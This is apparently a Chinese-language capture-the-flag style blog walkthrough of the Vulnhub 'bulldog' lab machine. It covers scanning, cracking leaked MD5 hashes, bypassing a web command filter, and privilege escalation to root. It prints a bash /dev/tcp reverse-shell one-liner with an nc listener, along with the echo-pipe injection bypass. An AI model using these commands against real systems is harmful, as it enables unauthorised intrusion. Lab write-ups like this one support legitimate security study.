【渗透测试】靶机渗透Vulnhub-bulldog

时间  2020-06-08 标签 渗透测试 靶机 渗透 vulnhub bulldog

目录

前言

bulldog靶机的渗透有不少的前辈都作了教程,我这篇也是参考了许多前辈的博客,可是中间仍是有不少不懂得地方,官方说有两条路能够拿到root,我只找到了一条。如下内容均是我做为一个菜鸡实操以后的所得,为了留个印子记下来。
参考博客:
https://blog.csdn.net/Eastmount/article/details/106066009
https://blog.csdn.net/qq_38684504/article/details/89706775
https://www.lagou.com/lgeduarticle/38714.htmlhtml

1、bulldog靶机安装

靶场地址 :https://www.vulnhub.com/entry/bulldog-1%2C211/前端

靶机安装 :https://download.vulnhub.com/bulldog/python

渗透目标 :拿到靶机root权限,看到祝贺信息web

一、下载靶机bulldog 。
二、将靶机放到你想存放的地方,而后用VMware–文件–打开–点击导入。
三、导入的时候可能出现“未经过OVF规范一致性或虚拟硬件合规性检查”,请单击“重试”导入便可。
四、保证bulldog和kali在同一个局域网内(这里方法有不少),我采用的是bulldog和kali都修改网络适配器为NAT模式(bulldog默认是桥接模式)。
五、而后点击开启bulldog虚拟机(开启放着就好,不须要其余操做)面试

问题
一、bulldog开启的时候为何没有显示ip地址?
答:有的博主作的时候显示了ip地址,有的博主没有显示,可能和bulldog的版本有关系,这里不影响渗透,若是没有显示ip,并且经过kali扫描的时候也没有扫描到bulldog主机的ip,那么多是配置问题,须要设置一下。
二、kali扫描不到bulldog主机ip该如何设置?
答:shell

【1】从新启动bulldog,到开机页面选择第二个Ubuntu的高级选项。
【2】进入高级选项,再次选择第二个Linux内核版本的恢复模式回车。
在这里插入图片描述vim

【3】选择root一行回车,进入命令行模式。
在这里插入图片描述bash

【4】输入 mount -o rw,remount /
【5】输入 ifconfig -a (查看网卡名称)
在这里插入图片描述网络

【6】输入 vim /etc/network/interfaces ,修改网卡名称成【5】步骤查询的结果,保存。
在这里插入图片描述tcp

【7】输入 reboot 重启。
在这里插入图片描述完成后大概长这样:(我也没有显示ip)
在这里插入图片描述

2、bulldog靶机渗透

个人设备信息以下:
物理机:win10
kali(NAT):ip 192.168.245.133
bulldog(NAT):ip 192.168.245.136

一、信息搜集

1.1 主机发现
获得目标靶机bulldog的ip:192.168.245.136/24

方法一:netdiscover -i eth0 -r 192.168.245.0/24
【-i】指定网卡设备
【-r】指定扫描网段
在这里插入图片描述方法二:arp-scan -l
在这里插入图片描述
方法三:nmap -sP 192.168.245.0/24 【直接扫描C段】
【-sP】发现扫描网络存活主机。(直连arp非直连tcp80 icmp)
在这里插入图片描述
1.2 端口扫描

获得端口,版本,操做系统等信息

【端口扫描】nmap -sS -T4 -A -p- 192.168.245.136
-sS:半开扫描,记入系统日志风险小
-sP:扫描端口前,先使用ping扫描,保证主机存活
-A:全面系统检测,启用脚本检测和扫描

在这里插入图片描述发现开放80,8080,23端口

【操做系统扫描】namp -O 192.168.245.136
在这里插入图片描述【端口测试】nc -nv 192.168.245.136
在这里插入图片描述
在这里插入图片描述
尝试远程链接23端口后失败。

1.3 目录扫描
主机访问192.168.245.136:80

在这里插入图片描述方法一:dirb http://192.168.245.136
在这里插入图片描述
方法二:dirsearch.py -u http://192.168.245.136 -e *

在这里插入图片描述获得以下目录,而后挨个访问
http://192.168.245.136/admin/
http://192.168.245.136/dev/
http://192.168.245.136/admin/auth/
http://192.168.245.136/admin/login/
http://192.168.245.136/admin/logout/
http://192.168.245.136/dev/shell/

发现admin登陆界面须要登陆,dev能够访问,可是dev/shell 没法访问

在这里插入图片描述尝试万能密码失败
在这里插入图片描述
在这里插入图片描述dev界面
在这里插入图片描述dev界面F12查看器查看,发现疑似哈希密码串
在这里插入图片描述dev查看源码,效果和查看器同样
在这里插入图片描述dev/shell不能访问
在这里插入图片描述

二、Web渗透–后台登陆

上面发现dev页面隐藏一些疑似哈希的密码串,因而想撞撞哈希值
撞md5经常使用网址:
https://www.cmd5.com/
https://www.somd5.com/
在这里插入图片描述在这里插入图片描述
查询成功可是付费???果断换网址
在这里插入图片描述在这里插入图片描述全部结果汇总:
在这里插入图片描述正好是最后两个,猜想这两个一个是用户名一个是密码而后登陆
在这里插入图片描述

打脸不要太快

回到dev界面,发现每一个邮箱都是XXX@yyyyyyy.com 的格式,前面XXX看着高度可疑,因而用最后两个 nick 和 sarah 以及 bulldog和bulldoglover 两两组合用户名和密码尝试,发现 nick 对应 bulldog,sarah 对应 bulldoglover登陆成功!
在这里插入图片描述

在这里插入图片描述可是,没有一点权限。(那我为啥费劲登上来????)

不过,登陆成功以后dev/shell能够访问了
在这里插入图片描述
里面列出的几个命令都是能够操做的
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

三、Web渗透–命令注入&nc反弹shell

dev/shell页面能够访问,可是只有几个命令,有过滤,下面开始想办法绕过过滤,尝试能不能反弹shell

在这里插入图片描述|,&,&&,均可以绕过

这里有大佬想出用echo命令打包的方式绕过,因为我菜,就用他的方法了

首先:本地kali用nc监听一个端口,这里随便设置4444端口
nc -lvp 4444
而后:尝试反弹:bash -i >& /dev/tcp/192.168.245.133/4444 0>&1,报错【中间是kali的ip】
在这里插入图片描述
用echo打包再试:echo ‘bash -i >& /dev/tcp/192.168.245.133/4444 0>&1’|bash
【echo命令是容许执行的,因此利用echo构建一个反弹shell的命令,而后用管道符给bash执行】

在这里插入图片描述此时kali监听接收到反弹过来的shell
在这里插入图片描述到这里咱们已经进入了系统,可是权限还不是root,离变成root的目标还有距离,下一步就开始提权操做。

四、权限提高

切换成root用户是须要root用户的密码,因此咱们这里主要目标是在有限的权限里面搜集到root的密码,而后完成提权。

首先查看/etc/passwd看用户,发现bulldogadmin用户,尝试cd到该目录底下找信息
在这里插入图片描述

进入bulldogadmin目录 ls -al 发现隐藏文件 .hiddenadmindirectory,进入并查看

在这里插入图片描述

进入.hiddenadmindirectory 发现 customPermissionApp和note两个文件在这里插入图片描述
cat这两个文件没有发现什么有价值的信息
在这里插入图片描述
在这里插入图片描述

有大佬说能够利用strings查看可执行文件中的内容,赶忙试试(strings命令用来提取和显示非文本文件中的文本字符串)【受教了受教了】

在这里插入图片描述标红的地方是能够之处,
猜想多是密码,应为SUPER、 ulitimate、PASSWORD、youCANTget, 能够把他们连到一块儿正好是SUPERultimatePASSWORDyouCANTget,H是来混淆的,中间恰好有PASSWORD;

而后火烧眉毛的su -i 挨个试了一遍,发现没有一个对的
在这里插入图片描述

请教大佬发现,这里有个小技巧,能够用Python调用本地的shell实现,命令以下:
python -c ‘import pty; pty.spawn("/bin/bash")’
在这里插入图片描述而后在切换root,密码是最长的那个SUPERultimatePASSWORDyouCANTget

在这里插入图片描述成功拿到root权限
在这里插入图片描述

渗透步骤回顾

一、信息收集
目标IP探测 (arp-scan、netdiscover、nmap)
Nmap端口扫描,版本,操做系统扫描等
二、目录扫描
用dirb扫出了许多关键目录(admin和dev页面)
用dirsearch扫描出关键目录
三、敏感文件查找及网页访问
四、MD5破解(在线破解,多个网址试试)
仔细观察网页信息,该靶机主要在/dev目录处前端源码泄露了MD5密码信息
五、登陆管理员帐号,并在/dev/shell页面利用命令注入漏洞
六、命令注入和nc反弹shell
命令拼接(ls &&echo ‘bash -i >& /dev/tcp/192.168.245.133/4444 0>&1’|bash
nc反弹shell(kali机监听 nc -lvp 4444)
七、权限提高
找root权限用户,找敏感目录,文件
strings的使用
用Python调用本地的shell实现
sudo python -c ‘import pty; pty.spawn("/bin/bash")’
sudo su - root

感悟

越学越以为本身菜,因此只能不断的学下去,这篇博客里面还有一些地方我本身都不大懂,后续会本身先弄明白,忙活了几个月找暑假实习,从内推到网申再到校招,这段时间没怎么写博客,算是偷懒了。不过找实习的过程仍是学习了不少,从最开始接到面试电话吓得腿抖,到后面慢慢摸清了面试官的问题套路和面试官有说有笑,本身也算是进步了吧,固然会就是会不会就是不会,和面试官胡搅蛮缠是不行的。也慢慢以为“自我”这种东西是碰撞出来的,越是碰到强的东西,凶狠的东西,高水准的东西就会反弹回来,虽然撞的鼻青脸肿,可是能够反馈给你本身的水平,让你知道人外有人天外有天,还需夹着尾巴学习,那就夹着尾巴好了,我是一个怀揣大佬梦想的菜鸡,不想当大佬的菜鸡不是好菜鸡!明天就要去上班实习了,实习单位还不错,算是业内一流水平,这会反而睡不着,忙活了这么久,六一节了心情开始忐忑,嗯,但愿后面的路我能勇敢的走下去,给本身加加油。

by 久违 2020.6.1 凌晨

联系我们 沪ICP备13005482号-10